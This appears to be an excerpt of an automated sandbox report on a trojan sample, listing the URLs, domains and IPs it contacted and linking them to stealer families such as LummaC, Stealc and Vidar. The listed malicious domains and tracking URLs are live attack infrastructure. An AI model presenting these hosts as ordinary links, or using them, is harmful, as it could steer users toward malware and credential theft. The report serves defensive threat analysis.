                                                                                                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/recaptcha/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://checkout.steampowered.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://post-to-me.com/XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://post-to-me.com/track_prt.php?sub=0&cc=DEQXIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                		unknown
                                                                                                                                                https://store.steampowered.com/;3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/about/3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://steamcommunity.com/my/wishlist/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DE6XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://help.steampowered.com/en/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/market/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/news/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://recaptcha.net/recaptcha/;3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/discussions/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/stats/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://medal.tv3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/G3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://immureprech.biz/apix3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319003247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620163247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://steamcommunity.com/workshop/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://login.steampowered.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb3247.tmp.exe, 00000003.00000003.1550829896.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/legal/3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://steamcommunity.com/profiles/76561199724331900g3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://recaptcha.net3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://127.0.0.1:270603247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                104.21.22.222
                                                                                                                                                                                                                                		immureprech.bizUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.96.1
                                                                                                                                                                                                                                		deafeninggeh.bizUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.56.70
                                                                                                                                                                                                                                		post-to-me.comUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.102.49.254
                                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                                		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                176.113.115.19
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		49505SELECTELRUfalse

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1575128
                                                                                                                                                                                                                                Start date and time:2024-12-14 14:07:19 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 8m 38s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:14
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:XIaCqh1vRm.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:e94835b4d3d35d99400dfd68fe580197.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@4/7@11/5
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 93%
                                                                                                                                                                                                                                • Number of executed functions: 41
                                                                                                                                                                                                                                • Number of non-executed functions: 336
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 20.12.23.50, 20.190.147.4
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                08:08:19API Interceptor9040452x Sleep call for process: XIaCqh1vRm.exe modified
                                                                                                                                                                                                                                08:08:25API Interceptor5x Sleep call for process: 3247.tmp.exe modified
                                                                                                                                                                                                                                08:09:09API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                104.21.22.222QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            http://gerxx.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                                • pelisplus.so/administrator/index.php
                                                                                                                                                                                                                                                Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                • www.mffnow.info/1a34/
                                                                                                                                                                                                                                                104.21.56.70QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                        YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                          vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                            Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                              x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  zGHItMC5Zc.exeGet hashmaliciousStealcBrowse

                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    immureprech.bizQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    steamcommunity.comQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    post-to-me.comQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70

                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSPqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                                                    PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
